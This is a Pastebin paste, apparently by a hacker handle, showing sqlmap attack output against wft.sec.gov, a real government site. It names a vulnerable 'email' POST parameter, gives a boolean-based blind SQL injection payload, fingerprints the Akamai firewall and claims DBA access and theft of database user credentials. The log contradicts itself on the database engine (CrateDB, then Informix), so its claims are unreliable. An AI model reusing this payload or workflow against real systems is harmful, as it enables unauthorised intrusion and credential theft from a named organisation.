API tools faq
paste
Advertisement
xGHOSTSECx

wft.sec.gov

xGHOSTSECx
Jul 16th, 2021
725
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.74 KB | None | 0 0
raw download clone embed print report
  1. POST https://wft.sec.gov
  2. POST data: email=&email=
  3.  
  4. Edit POST data [default: email=&email=] (Warning: blank fields detected): email=&email=
  5.  
  6. [23:25:55] [CRITICAL] WAF/IPS identified as 'Kona Site Defender (Akamai Technologies)'
  7.  
  8. it looks like the back-end DBMS is 'CrateDB'.
  9.  
  10. POST parameter 'email' is vulnerable.
  11.  
  12. sqlmap identified the following injection point(s) with a total of 358 HTTP(s) requests:
  13. ---
  14. Parameter: email (POST)
  15. Type: boolean-based blind
  16. Title: OR boolean-based blind - WHERE or HAVING clause
  17. Payload: email=sIUT&email=-7716 OR 2100=2100
  18. ---
  19. web application technology: Nginx
  20. back-end DBMS: Informix
  21. current user is DBA: True
  22. [23:31:01] [SQL-Blind] able to retrieve the credentials of database users
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!